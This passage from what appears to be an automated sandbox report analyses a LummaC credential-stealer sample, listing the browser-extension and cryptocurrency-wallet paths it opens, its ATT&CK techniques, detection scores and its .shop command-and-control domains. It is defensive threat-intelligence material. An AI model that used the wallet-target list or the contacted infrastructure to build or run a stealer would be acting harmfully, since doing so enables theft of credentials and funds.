            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: Yara matchFile source: 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: o7b91j8vnJ.exe PID: 6856, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: o7b91j8vnJ.exe PID: 6856, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		11
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory11
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol31
            Data from Local System            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares2
            Clipboard Data            		113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Software Packing            		LSA Secrets12
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            o7b91j8vnJ.exe43%VirustotalBrowse
            o7b91j8vnJ.exe100%AviraHEUR/AGEN.1312652
            o7b91j8vnJ.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            strollheavengwu.shop1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            https://support.microsof0%URL Reputationsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
            https://strollheavengwu.shop/apime0%Avira URL Cloudsafe
            https://strollheavengwu.shop/apib20%Avira URL Cloudsafe
            shortsvelventysjo.shop0%Avira URL Cloudsafe
            tolerateilusidjukl.shop0%Avira URL Cloudsafe
            https://strollheavengwu.shop/y0%Avira URL Cloudsafe
            https://strollheavengwu.shop/apih020%Avira URL Cloudsafe
            https://strollheavengwu.shop/api100%Avira URL Cloudmalware
            tolerateilusidjukl.shop14%VirustotalBrowse
            shatterbreathepsw.shop0%Avira URL Cloudsafe
            shortsvelventysjo.shop16%VirustotalBrowse
            https://strollheavengwu.shop/apie0%Avira URL Cloudsafe
            https://strollheavengwu.shop/v0%Avira URL Cloudsafe
            demonstationfukewko.shop0%Avira URL Cloudsafe
            https://strollheavengwu.shop/apis0%Avira URL Cloudsafe
            https://strollheavengwu.shop/api11%VirustotalBrowse
            productivelookewr.shop0%Avira URL Cloudsafe
            https://strollheavengwu.shop/d0%Avira URL Cloudsafe
            https://strollheavengwu.shop/apie5%VirustotalBrowse
            demonstationfukewko.shop18%VirustotalBrowse
            https://strollheavengwu.shop/e0%Avira URL Cloudsafe
            alcojoldwograpciw.shop0%Avira URL Cloudsafe
            strollheavengwu.shop0%Avira URL Cloudsafe
            productivelookewr.shop16%VirustotalBrowse
            https://strollheavengwu.shop/90%Avira URL Cloudsafe
            shatterbreathepsw.shop17%VirustotalBrowse
            incredibleextedwj.shop0%Avira URL Cloudsafe
            https://strollheavengwu.shop/d10%VirustotalBrowse
            https://strollheavengwu.shop/apior0%Avira URL Cloudsafe
            alcojoldwograpciw.shop17%VirustotalBrowse
            https://strollheavengwu.shop/e10%VirustotalBrowse
            liabilitynighstjsko.shop0%Avira URL Cloudsafe
            incredibleextedwj.shop14%VirustotalBrowse
            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
            strollheavengwu.shop1%VirustotalBrowse
            https://strollheavengwu.shop/70%Avira URL Cloudsafe
            https://strollheavengwu.shop/apiIF30%Avira URL Cloudsafe
            https://strollheavengwu.shop/0%Avira URL Cloudsafe
            https://strollheavengwu.shop/apiN0%Avira URL Cloudsafe
            liabilitynighstjsko.shop17%VirustotalBrowse
            https://strollheavengwu.shop/1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            strollheavengwu.shop
            		172.67.163.209
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            shortsvelventysjo.shoptrue
            • 16%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            tolerateilusidjukl.shoptrue
            • 14%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://strollheavengwu.shop/apitrue
            • 11%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            shatterbreathepsw.shoptrue
            • 17%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            demonstationfukewko.shoptrue
            • 18%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            productivelookewr.shoptrue
            • 16%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            strollheavengwu.shoptrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            alcojoldwograpciw.shoptrue
            • 17%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            incredibleextedwj.shoptrue
            • 14%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            liabilitynighstjsko.shoptrue
            • 17%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabo7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://strollheavengwu.shop/yo7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/ac/?q=o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://strollheavengwu.shop/apib2o7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://strollheavengwu.shop/apimeo7b91j8vnJ.exe, 00000000.00000003.1649788363.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1649671760.00000000042CC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://strollheavengwu.shop/apih02o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://strollheavengwu.shop/apieo7b91j8vnJ.exe, 00000000.00000003.1721593582.000000000434A000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000002.1845373777.000000000434C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 5%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17o7b91j8vnJ.exe, 00000000.00000003.1649972995.0000000006880000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://strollheavengwu.shop/vo7b91j8vnJ.exe, 00000000.00000003.1668259812.0000000004326000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1667240697.0000000004325000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://strollheavengwu.shop/apiso7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYio7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://x1.c.lencr.org/0o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://x1.i.lencr.org/0o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searcho7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://strollheavengwu.shop/do7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 10%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://strollheavengwu.shop/eo7b91j8vnJ.exe, 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 10%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.mozilla.org/products/firefoxgro.allo7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://strollheavengwu.shop/9o7b91j8vnJ.exe, 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgo7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoo7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://strollheavengwu.shop/Do7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://strollheavengwu.shop/apioro7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.rootca1.amazontrust.com/rootca1.crl0o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://upx.sf.netAmcache.hve.3.drfalse
                                    		high
                                    http://ocsp.rootca1.amazontrust.com0:o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016o7b91j8vnJ.exe, 00000000.00000003.1649972995.0000000006880000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.ecosia.org/newtab/o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bro7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://strollheavengwu.shop/7o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ac.ecosia.org/autocomplete?q=o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://support.microsofo7b91j8vnJ.exe, 00000000.00000003.1649972995.0000000006882000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://strollheavengwu.shop/apiIF3o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://strollheavengwu.shop/apiNo7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://strollheavengwu.shop/o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1687686767.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1679141291.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1658730673.000000000682F000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1659021463.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1679306292.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1677973683.0000000006830000.00000004.00000800.00020000.00000000.sdmp, o7b91j8vnJ.exe, 00000000.00000003.1679474150.0000000006830000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 1%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              172.67.163.209
                                              		strollheavengwu.shopUnited States
                                              		13335CLOUDFLARENETUStrue

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1431408
                                              Start date and time:2024-04-25 01:59:04 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 16s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:o7b91j8vnJ.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:7b3e62bcbeed62a180220669f6a0c548.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 94%
                                              • Number of executed functions: 40
                                              • Number of non-executed functions: 100
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenFile calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              01:59:52API Interceptor8x Sleep call for process: o7b91j8vnJ.exe modified
                                              02:00:12API Interceptor1x Sleep call for process: WerFault.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              172.67.163.209asbpKOngY0.exeGet hashmaliciousLummaCBrowse
                                                file.exeGet hashmaliciousLummaCBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  strollheavengwu.shophttp://myidealwedding.com.auGet hashmaliciousBitRAT, HTMLPhisherBrowse
                                                  • 104.21.15.198
                                                  iPUk65i3yI.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.15.198
                                                  asbpKOngY0.exeGet hashmaliciousLummaCBrowse
                                                  • 172.67.163.209
                                                  2FjvjcayaH.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.15.198
                                                  qrLdMv1QXG.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.15.198
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 172.67.163.209
                                                  LwnI84BBtb.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.15.198
                                                  file.exeGet hashmaliciousLummaCBrowse
                                                  • 104.21.15.198

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUShttp://confirmartucuentamsnaquimx.hstn.me/login.live.com_login_verify_credentials_outlook.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 172.64.151.101
                                                  https://ernestjcrist.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2020596-12595&13813e8=https://femininplurielles.comGet hashmaliciousTechSupportScamBrowse
                                                  • 104.21.53.38
                                                  https://fassouyatajadalravuij.blob.core.windows.net/fassouyatajadalravuij/1.html?KIUS8wH0YY7cB2NMwxGsVoa5iezV7W9cvLqamEPM8HdxqBLgYyX6Goh6aNwgjitRkRWLcAfZPzQwfAIRlIAPQ3jfogxjD1t9nA60#cl/26081_md/7/18507/5419/19036/1614238Get hashmaliciousPhisherBrowse
                                                  • 104.21.80.104
                                                  https://windowdefalerts-error0x21702-alert-virus-detected.pages.dev/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                  • 172.66.44.98
                                                  https://windowdefalerts-error0x21701-alert-virus-detected.pages.dev/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                  • 104.21.56.41
                                                  https://www.google.com.np/amp/s/www.google.com%2Furl%3Fsa%3DD%26q%3Dhttps%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fmy-awesome-project-id-35889.appspot.com%2Fo%2Fsos.html%253Falt%253Dmedia%2526token%253D8c2f5cb7-624d-469a-a987-a3c9e3bcaf1c%26ust%3D1714080900000000%26usg%3DAOvVaw34yUu7IQGPgWBmXhCFwzfl%26hl%3Den%26source%3Dgmail#Z2xlbm5Ab2JzaWRpYW5zZWN1cml0eS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.2.184
                                                  https://ppo46-secondary.z8.web.core.windows.net/werrx01USAHTML/?bcda=1-833-293-0124Get hashmaliciousTechSupportScamBrowse
                                                  • 172.67.208.186
                                                  https://zzv4-secondary.z13.web.core.windows.net/werrx01USAHTML/?bcda=1-833-693-8251Get hashmaliciousTechSupportScamBrowse
                                                  • 172.67.208.186
                                                  https://apppbx07.z13.web.core.windows.net/Win0security-helpline07/index.html?ph0n=+1-000-000-0000Get hashmaliciousTechSupportScamBrowse
                                                  • 104.21.53.38
                                                  https://pub-839300a9c6054ed7b1c425122a9dd984.r2.dev/doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.18.2.35

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  a0e9f5d64349fb13191bc781f81f42e1SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                  • 172.67.163.209
                                                  file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                  • 172.67.163.209
                                                  https://56hytuti5.weebly.com/Get hashmaliciousUnknownBrowse
                                                  • 172.67.163.209
                                                  udVh4Ist4Z.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                  • 172.67.163.209
                                                  samradapps_datepicker_221114.xlamGet hashmaliciousUnknownBrowse
                                                  • 172.67.163.209
                                                  Enquiry 230424.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                  • 172.67.163.209
                                                  URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                  • 172.67.163.209
                                                  fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                  • 172.67.163.209
                                                  Payment MT103.xlsGet hashmaliciousUnknownBrowse
                                                  • 172.67.163.209
                                                  Ref_Order04.xlsGet hashmaliciousUnknownBrowse
                                                  • 172.67.163.209

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_o7b91j8vnJ.exe_dfc5acfeaf57144235ca737a897d40b288f6a0b4_c3f06f9e_887bb615-5d50-4f8c-b092-fcd390f7cce2\Report.wer

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.9934271082223628
                                                  Encrypted:false
